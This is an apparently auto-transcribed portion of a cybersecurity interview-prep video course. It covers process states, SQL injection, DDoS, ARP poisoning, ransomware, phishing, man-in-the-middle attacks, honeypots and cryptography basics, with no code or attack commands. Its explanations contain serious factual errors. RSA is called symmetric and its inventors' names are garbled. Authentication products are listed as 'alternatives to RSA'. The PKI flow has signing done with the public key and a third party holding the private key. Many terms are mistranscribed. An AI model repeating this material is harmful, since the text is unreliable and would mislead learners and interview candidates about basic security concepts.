Input to the processor process it get that output back to the application execute it and then show it onto the graphical user interface for the user so in linux there are five states for a process first is the ready space now in ready in this state the process is created and
It is ready to run so it is waiting uh it is waiting for input it’s ready uh the application is executed the running is when the process is being executed itself blocked or wait is when user input is being looked upon so it’s waiting for user input so that it can do
The processing completed or terminated it has completed its execution or was terminated by the operating system for some reason or the other so this is where things have uh the processing has been completed and then lasted state is zombie where the process is terminated but the process table still holds the
Information uh maybe it is waiting for the kill request before it gets terminated so these are the five states for a linux process to be in and that brings us to the ten questions in the operating system and application space in the next video we’ll be looking at ten more
Questions on cyber attacks interview questions based on cyber attacks let’s start off with the first one the first question is what is sql injection sql stands for structured query language which is a language that is used by most of your databases or your relational databases the variations of your database would be
Mysql microsoft sql oracle sql you’ll have ibm databases all of these databases utilize the structured query languages to interact with the applications now all of these databases have their own syntax so you’ll have to study most of these databases based on which applications and which databases you want to provide security for
But as the name suggests sql injection vulnerability or structured query language injection vulnerability is where a user can maliciously inject a sql input or a sql statement in a query and send it to the database and evoke a response response out of it so this vulnerability is not
Specifically to the database it uh the vulnerability lies more in the application and the coding of that application so when the application receives a query which it needs to be forwarded to the sql uh database we need to configure at the application level of what queries are allowed and what
Queries are not allowed so there are different various aspects of how to manage a sql injection vulnerability but the basic flaw lies in the application where uh invalidated input is accepted and sent forward to the database where the database might confuse it into an executable statement and thus create a
Response that was not warranted there are various types of sql injections as shown on the screen in-band sql injection where you can look at an error based or a union based injection a blind sql injection where it is either boolean based or a time-based attack and then an out-of-bound sql injection
Essentially you’re looking at databases and you’re looking at application security where you want to encourage secure coding practices so in unvalidated input is mitigated the next question is what is spoofing now in spoofing you’re basically assuming the identity of another person so here the attacker pretends to be some
Other person or an organization and sends you an email that appears to be a legitimate email it looks almost genuine it has been constructed to replicate what a genuine email would have been and it is very difficult to spot a fake one there are different ways to identify
Whether email is genuine or not but that’s for a different video moving on to the next question what is a distributed denial of service attack or a ddos attack now generally a denial of service attack is an attack where legitimate users are prevented access to the resources that they legitimately can
Access right so for example if it is a bandwidth-based attack the attacker consumes the bandwidth of the network in such a way that there is no more bandwidth left for legitimate users to access the network now a single device may not be able to generate that much amount of
Traffic to consume the bandwidth of a huge server thus the attacker will construct a botnet and through that botnet they will launch a distributed denial of service attack to the target victim right so a botnet uh there are two terms that you want to look at over here
The first term is a bot and the second one being the botnet itself bot is a software that once installed on a victim’s machine allows the hacker to send remote commands to that machine that will make it to generate some activity once we have enough machines on which such bots have been implemented
The collection of these machines would be known as a botnet so an attacker would then instruct this entire botnet to start generating data traffic to be to be sent to the targeted network or to the targeted server which will then pop down the server thus crashing it and preventing users from
Accessing that particular resource the next question is how to avoid our poisoning or arp now first let’s understand what arp is arp stands for address resolution protocol which is a protocol used by computers to communicate over the network once your computer boots up it starts a discovery process of
Identifying its neighbors so if i’m in a particular subnet my machine will proactively send out a rp request an address resolution protocol to find out which other machines are within the same network and which are live once it sends out a query a live machine will respond to that query along
With its mac address this information is then stored in what is known as a arp table or an arp table on the machine’s cache so whenever my machine now wants to send out a packet to this particular machine it will go to the arp table it will identify the ip address and the
Associated mac address it will print that onto the data packet as a destination uh iep and destination mac and send that packet across to the switch the switch will then identify the mac address and send the packet to the relevant machine that is connected to that particular switch
Now to confuse the switch into sending it to a different machine our poisoning attack is created this attack is generally launched to create a man in the middle attack now to prevent this our poisoning from happening in the first place there are three different aspects that we can
Utilize first we can use packet filtering which will filter out and block packets that are the same source address data so you have identified some malicious ip addresses and you want to block out some ip addresses so you’re using a packet filter firewall where you have constructed the firewall to filter out
Certain packets originating from particular range of ip addresses this firewall and this technique will then block those kind of packets coming in second keeping away from trust relationships organizations will develop protocols that do not depend on trust relationships and thus you want to keep this protocol away from there once
You have created a trust relationship uh these machines should not be sending out arp requests to other machines in the first place since uh the trust relations has been has been defined and these machines know whom to communicate with such kind of protocols should then be disabled
Or you can use an erp spoofing software so there are some there are software’s out there that will look for arp spoofing and prevent that from happening in the first place so if somebody has sent out a spoofed arp packet that packet will be picked up by this software
And it will be mitigated of network visualizers like glass wire antiviruses like so force uh they haven’t built capabilities of identifying uh our up spoofing attacks and mitigate them in the first place in the next question we are going to discuss what is ransomware now ransomware is a type of malware that
Blocks victims to access personal files and demands ransom to regain access there are three categories before we go into the categories let’s just revisit what ransomware is let’s start with the word malware malware is a malicious software that poses as a legitimate software but has a payload that will
Have a security impact on your machine so in this instance uh viruses trojans all of these can be classified under malwares so can ransomware a trojan is a software that will give you a backdoor access to it to a particular device a virus will do some destructive activity
On that device a ransomware will basically encrypt the data of that particular user from on that particular machine thus rendering that that data inaccessible to the users themselves and in turn will demand the ransom to provide access to that particular data so the three types of ransomwares the first one is scareware
Which uses social engineering to cause an anxiety or the perception of a threat to manipulate users into buying unwanted software so this preys on the gullibility of humans where you can see a pop-up appearing on your screen which can scare you into believing that you may have been
Attacked or there is a virus on your machine and then instructs you to download a particular software to mitigate that particular virus now the malware will be in this software that you will be downloading and then a ransomware will be installed and your data will be encrypted screen lockers uh where
Locking uses computers by preventing them from logging in and displaying an official looking message you will see a screen saver once you boot up which prevents you from accessing the login page so it will not allow you to log into your own machine but it will give
You a warning that your data has been encrypted and you need to connect to a particular email address and send bit to send bitcoins over there to get a decryption key to access your own data and then the encrypting ransomware displays a message demanding payment in return for the private asymmetric key
Which is needed to decrypt the symmetric keys for encrypted file so once your files have been encrypted you might just have a blank screen in front of you where you’ll receive a warning message uh where it instructs you to pay up a ransom in bitcoins or in some cryptocurrency to some particular
Digital e-wallet which is not traceable and once you make that payment they will send you the decryption key and then you can access your data if getting your learning started is half the battle what if you could do that for free visit scale up by simply learn click on the
Link in the description to know more then talking about the next question what is the difference between an active and a passive cyber attack now when we talk about cyber attacks cyber attack is activity that is caused by a malicious user who wants to try to get access or do some security incidents
On the victim’s devices so there are two ways that can happen it’s either in an active manner or a passive manner in an active manner the intruder attempts to disrupt a network’s normalcy modifies data and tries to alter the system’s resources so this is more active where the attacker will proactively try to
Destroy the network so that communications fail or they might try to modify the data where uh we’re using a ransom where they can encrypt it or they might delete that data using a virus or steal that data using a trojan or they might even alter the data uh so that it
Is no longer trustworthy whereas in a passive attack the intruder intercepts data traveling to a network here the intruder eavesdrop but does not modify the message so they’re just listening in they’re just observing what is going on they are not manipulating the data they are not stealing anything it’s just that they
Are monitoring what the activity that’s going on the next question what is a social engineering attack now social engineering attack is a people based attack the victim here is the human by itself the vulnerability also lies in the human it may be executed through a computer but
End of the day the calibrity is of the human so it is the art of manipulating people so that they end up giving up confidential information now we always read in the papers where somebody got manipulated their passwords got hacked and somebody’s life savings got wiped out
Right because they shared the otp with someone or they shared a the password with someone now creating a scenario where these people will fall prey to this attack and share this kind of personal information to unknown people that is where the social engineering attack comes in creating that scenario which will ensure
That these people give out this confidential information now there are three categories in this attack one the first one is a phishing attack second is a sphere phishing attack and a third is a railing attack now phishing attack is basically a generic attack it is targeted to the world at large
Whoever falls prey to that attack will be a victim whereas a spear phishing attack is a targeted attack towards a specific individual or a group of individuals or towards an organization so there is a lot more research that goes into spearfishing where you analyze the victim you try to figure out what their
Vulnerabilities are and you tailor make or you customize the attack to that particular vulnerability once you have that attack you launch it against those people those people will then fall prey to this attack an availing attack is where you’re attacking top level executives so the c-level executives of an organization
Politicians movie stars wealthy and powerful people so any of these people when they’re attacked it will be known as a veiling attack next question what is man in the middle attack now this is something that we had touched based when we talked about arp where the arp poisoning attack needs to
Be executed to leverage a man in the middle attack now in the man in the middle attack the attacker attacking computer takes the ip address of the client unaware of this the server continues to communicate with the attacker now if you remember in a previous question we have also talked
About spoofing so in this scenario attacker has spoofed their ip address to replicate themselves as a genuine client and now with that spoofing in mind they might either through our poisoning attack or just because of the spoofed ip address become a man in the middle that means that they are now
Each dropping on the conversation between the actual client and the server by posing themselves as a server in this scenario the attacker is now a go between between the client and the server and can eavesdrop and can copy the data if they want they can modify
The data as well so as you can see on the screen the attacker becomes man in the middle which means that they are now eavesdropping on the conversation that is happening between the client and the server the next question who are black hat hackers and whitehead hackers the main thing is the
Differentiation between a black hat hacker and a white ted hacker now our black hat hackers are skilled individuals who illegally hack into a system the motive behind such an attack is mostly for monetary gain these individuals are known also known as security crackers now if you look at your criminal hackers
Those who have malicious intent those who do hacking for the intent of personal gain or for the matter of disruption the main thing that black hat hackers lack is authorization they are not authorized to do the activity that they are about to do and they are going to get
Unauthorized access to devices or to data which is going to cause losses to the organization involved whereas on the other side a white hat hacker are also known as ethical hackers these are the individuals who discover vulnerabilities in a computer network and they help the organizations mitigate these vulnerabilities they help the
Organizations defend themselves from black hat hackers so the main difference between these two types of hackers a black hat and a white hat is the intent and the authorization so black hat hackers will have malicious intent they will try to personally gain from that attack from by finding out vulnerabilities they
Also will not have authorization to conduct whatever activity they are doing whereas on the other side whitehead hackers will be hired by organizations they will provide authorization for certain activity that the whitehead hacker can do to find out those vulnerabilities once those vulnerabilities have been find out found
Out by the white hat hacker they will report it to the management and guide them in implementing security controls to mitigate those vulnerabilities the main difference between a black hat and a white hat is the authorization and the intent the next question what are honey pots now honey pots are
A very interesting device that can be introduced in a network uh these basically are decoy servers that are implemented in a network to attract the attention of attacker it is there to lure an attacker into attacking that particular device thus creating a security blanket blanket for the rest of the devices
So if an attacker has been able to bypass a firewall and is now trying to scan a particular network when they scan they will come across various devices that are there in the network they will then proceed to do a vulnerability scan on these devices the honeypot at that
Point in time will provide as an approve as an attraction to these attackers because it will demonstrate some vulnerabilities to the hacker which will divert their attention so these vulnerabilities are simulated on these devices these actually do not exist but the moment the attacker then starts interacting with the honeypot the
Honeypot will identify that as a malicious traffic and will warm the one the administrator about a possible attack that is going on the administrator will then investigate through the honeypot of what activity is going on and then reconfigure the security controls to block the attacker or mitigate the attack itself right so
It is more of a decoy server uh that will showcase or simulate some vulnerabilities to an attacker thus to lure them and safeguard the rest of the network these are the 10 questions for cybersecurity in the next video we’ll be talking about cryptography the first question define cryptography encryption and decryption now cryptography
Is used by security professionals to scramble data into non-readable format which is used in securing that information so it involves converting data from a readable format into a non-readable format and then reversing it back to readable format again for example the word computer is now scrambled into looking like a unreadable
Format now if you look at this word that it has been scrambled into it would be very difficult for a human to figure out what the actual word was now in this scenario we have taken an algorithm where we have made a shift of the alphabet where we have
Added two alphabets the current one so c plus two becomes e o plus two becomes q m plus two becomes o so we have done a shift of two and thus the key over here for this algorithm is the alphabet plus 2. so any person who figures that out will be able to
Unscramble this and convert this back into readable text the fact of scrambling uh readable text data into something that is unreadable by using a particular key is what cryptography is all about now as we discussed the decryption again is replacing the alphabet and taking it further back by two characters so e
Minus two becomes c q minus two becomes o o minus two becomes m and so on so forth so anybody who knows this key uh the shift key anybody will able to decrypt this particular character so this depends on the user if i want to utilize alphabet plus five then the
Spacing the shifting of that character will be the fifth character from that particular character and so on so forth the next question what is the difference between cipher text and clear text cipher text refers to the text which is encrypted and totally undesirable the message received after decryption is
Known as clear text this text is comprehensible so the word computer is clear text that means that it has not been treated to any cryptographic measures it does what it is intended to be however if the moment we encrypt it that means we scramble it into unreadable
Text by using any of the algorithms that we’ll be looking at that text is known as a cipher text and without the key this becomes unreadable the clear text as discussed is the plain word that we have utilized we are using the english language in this instance so
The plain word computer is the clear text once we add the encryption layer to it we get the cipher text to it moving on to the next question what is a block cipher this refers to the method of encrypting the plain message block by block the plain message is broken down into fixed
Size blocks and then encrypted now a block cipher is normally used for data that is stored so a data that is stored on a hard disk and we want to encrypt that data that is known as block encryption or a block cipher so block cipher is an algorithm
That will allow you to encrypt data that is stored onto a hard disk so in this example we’ve got uh plain text which is 64 bits in size and we have added a layer of encryption to it so plain text plus the key that we have studied in the previous questions and
Then the scrambled data out of it which is unreadable and thus encrypted then the next question what is public key infrastructure now the public key infrastructure is a set of policies which secures the communication between a server and a client it uses two cryptographic keys public and private so
The infrastructure itself is a set of policies people procedures and techniques which are standardized in nature and are globally accepted which allow us to use digital certificates to encrypt data and decrypt the data at the other end we use asymmetric encryption over here which means that we
Use two keys one is a public key to encrypt and the private key to decrypt the other part of your encryption is a symmetric encryption where the same key is used to encrypt and the same key is used to decrypt now in a public key infrastructure
Like i said we have standardized that so in the standardizing part of it these are the various players that have been defined in the public key infrastructure the first is this user or the sender in the scenario the one who requires this digital signature to digitally sign a particular
Transaction or a communication a registration authority with whom they are going to register for that particular key the certification authority who issues that key the verification of authority who validates the key itself and the recipient who is going to be the other party of that particular transaction so how is this utilized
A sender or the user who requires this digital signature will request or apply for a digital signature with the registration authority the registration authority would validate the genuinely of the user so they might do some identity verification or proof of residence or something like that once they’ve identified the person
And they have validated the information they will then send the request to the certification authority stating that the sender has been validated and we can and the certification authority can issue the digital certificate to the particular user they will send the public key to the sender which will be utilized by the
Sender for further transactions so when the sender is going to sign some data and wants to send it across to the recipient they will use the public key to sign it and send it across the recipient will then validate with the verification authority to see if the
Data the signed data is correct or not now while the certification authority sends the public key to the sender the certification authority updates the private key with the verification authority so whatever is signed by the sender uh received by the recipient and they want to validate it they will send it
Back to the verification authority the verification authority will validate using the private key once the private key is validated it will then send the okay signal back to the recipient thus allowing the validation of that particular transaction if the signature is tampered with or is not the very fiction authority is not
Able to validate the signature it will then send a denial message back to the recipient and the transaction will not go through so the pki enables trusted digital identities for people so the pki grants secure access to digital resources based on the infrastructure that has been created and the core of
The pki is a certification authority which ensures that the trustworthiness of the digital data is ensured so going back to the previous slide these are the key players that have been standardized in the public key infrastructure the certification authority is the authority that issues the digital certificates the validation
Authority is the one who validates that uh digital certificate moving on what is rsa rsa is one of the first public key crypto systems that is used for secure data transmission it stands for reverse xiaomira and edelman now these are the three people who have created this algorithm rand rivest adi shamir and
Leonard edelman who are the inventors of this technique it is a symmetric cryptography algorithm which works on both public and private keys hence the encryption key is public and the decryption key is kept private now as we have discussed earlier symmetric and asymmetric cryptography symmetric cryptography is where the same key is
Used to encrypt and decrypt whereas asymmetric cryptography is where there are two keys to encrypt and decrypt the algorithm what are the few alternatives to rsa now rsa is an algorithm that is used for encryption there are a lot of other algorithms that can be utilized uh
To alter or to scramble data depending on your requirements so in the previous question we have studied and we have talked about what rsa is it stands for uh reverse xiaomi and edelman the three creators of that particular algorithm but there are a lot of alternatives to this algorithm
Depending on how secure you want that data to be and some of them are listed here on your screen duo security octa google authenticator and lastpass lastpass is a password manager so is dual security google authenticate is something that we all utilize it is an application that we can download and
Store on our mobile devices and we can set that up to authenticate ourselves with certain portals so it issues a unique id to us which once utilized will allow us access to those particular portals octa is an identity manager where you have created different digital identities and you have assigned them certain permissions
And based on your authentication mechanisms octa will allow or disallow access to those different applications or different portals as you have configured it so all four are authorization authentication mechanisms which can be used as alternatives to rsa if getting your learning started is half the battle what if you could do that for
Free visit scale up by simply learn click on the link in the description to know more next question what are the prime objectives of modern cryptography and this is a very important question because we’ve we’ve so far looked at what cryptography is and what public key infrastructure is but what is the
Achievement out of it why are we utilizing it and what do we want to gain out of it so the main and the prime objectives of modern cryptography are as follows mentioned on your screen the first one is confidentiality the second one is non-repudiation third one is authenticity and the fourth
One is integrity now if i go back to the first one confidentiality uh that is where i want to keep data confidential that means it will only be visible to the authorized users right so here i’ve created a list of people who have deemed as authorized users and have created a
Digital identity to them and have given access controls to those people now that is how confidentiality is ensured so when we want to keep data confidential we create a list of users who we are going to allow access to certain resources and we are going to define what access controls are to be
Utilized what access are allowed whether they got an administrative access or user level access and only those authorized users are going to be able to access this resources that is how we maintain confidentiality the next one is non-repudiation non-reputation is the prevention of denial of having been a part of a particular transaction
So in the public key infrastructure that we discussed where a digital signature was utilized to sign a particular transaction and then sent to the recipient the sender would not be able to deny of having originated that transaction because it was using their digital certificate thus non-reputation comes into the picture uh one more
Example that we can have here is uh on our mobile phones when we use sms short messaging service and we send a message to uh to another person the person when they receive a message the number is validated by the service operator and thus the sender cannot
Deny having sent that message the sender at the same time can have a delivery report sent to them from that the message was delivered to the inbox of the recipient and thus if the recipient denies having received that message the delivery report becomes proof of having that message being delivered to their
Inbox thus both the parties cannot deny of have a of being a part of that particular transaction then comes the part of authenticity now in confidentiality we have created a digital identity assigned it to a particular person and we have given them digital signatures where they cannot deny having
Being a part of that transaction but authenticity is the part where they try to prove that they are who they claim to be so if i am claiming a digital identity i have to prove that i am that person who i’m trying to claim to be and an
Example to that is when we go to our gmail.com websites it first asks us what is our username our username is normally our email address which identifies the account that we are trying to access right so this account is confidential because it is only authorized for a particular person
And once they identify themselves by identifying the email address that’s when the authentication part comes into the picture where it asks for the password now it has never ever happened that we just go on to the gmail.com type in a password and then it figures out which
Account we are talking about so the first step is always the confidentiality part where we identify which account we are talking about and then we try to authenticate as the owner of that particular account by providing the appropriate password to that account if both of these match only then do we get
Access to that account and we are able to make uh whatever transactions we want to make now when we are making those transactions non-reputation comes into the place where all our activity is also being logged so we have identified our account we have authenticated ourselves by providing the password so the proof is
There that it is us who are trying to access it and then whatever activity we do send an email receive an email delete something attach something all of those activities are logged and stored as proof of what actions have been done so tomorrow if we deny having sent that
Email gmail can still prove to us through those logs that though that that activity was done by us and the fourth part is integrity which ensures that the data received and sent and sent by the sender and received by the recipient has not been modified while in uh motion
So the integrity part is the trustworthiness of that data that the data has not been modified by any hacker or any other entity and is still trustworthy so these are the four prime objectives of modern cryptography once i have scrambled that data using my public’s uh signature it is only my
Private signature that is going to decrypt it right using these mechanisms i will be able to achieve all these four aspects of cryptography and security next question what is safer now safer stands for secure and fast encryption routine which is also a block cipher as we have discussed preview
Previously block cipher is a cipher that is used to encrypt data that is stored so it has a 64-bit block size and byte oriented algorithm safer’s encryption and decryption procedures are highly secure this technology is widely used in applications like digital payment card so when you are using your a digital
Payment gateway to make transactions so you have you have gone on to an online portal you want to purchase a particular item and then it takes you to another payment gateway where you have to fill in your credit card information sensitive information like your expiry dates cvv information and then
The otp or the password that you have created for your particular account now all of these need to be secured or highly secured based on pcidss which is the payment card industry data security standard so these standards ensure that certain protocols are utilized to attain that level of security safer
Is one of those block ciphers that is used under the digital payment gateway infrastructure next question how does the public infrastructure public key infrastructure work now we have already discussed this in the previous diagrams we have identified the key players the certification authority the registration authority the end user who requires the digital
Certificate the validation authority who’s going to validate it and then the recipe and the end user with whom the transaction is going to be uh conducted so the first point here is uh the request for the digital certificate is sent to the registration authority they validate it and then they okay to the
Certification authority who then process the request and the digital certificate is issued to the person who has requested it so when the person wants to conduct that transaction they use that digital certificate to sign that transaction with the end user the end user validates that with the validation authority and once validated the
Transaction goes through and now the last question what is the blowfish algorithm it is a 64-bit symmetric encryption algorithm so this is an algorithm that uses the same key to encrypt and the same key to decrypt the same secret key is used to encrypt and decrypt the messages here the
Operations are based on exclusive ors and additions to on 32-bit words the key has a maximum length of 448 bits now this is a little bit technical uh you might not want to go with this technical in an interview question you just need to identify what the algorithm
Is used for so whether it is a symmetric algorithm which means it uses the same key or a symmetric algorithm where it uses a public key to encrypt and a private key to decrypt thus the blowfish algorithm is just one more algorithm which uses symmetric encryption to encrypt and decrypt data
Algorithms that we have seen rsa and others that we have discussed as far as the interview questions are concerned what we need to remember is uh which algorithms are symmetric which algorithms are asymmetric what do symmetric algorithms do and what do unsymmetric uh symmetric algorithms do
And we also look at block ciphers and stream ciphers block ciphers are utilized to encrypt data that is stored stationary data data at rest and stream ciphers are utilized for data in motion while they’re being streamed and with that we have come to the end of this video on cyber security full course
I hope it was informative and interesting if you have any questions related to the topics that were covered in this video please ask away in the comments section below our team will help you solve your queries thanks for watching stay safe and keep learning hi there if you like this video
Subscribe to the simply learn youtube channel and click here to watch similar videos turn it up and get certified click here
0 Comments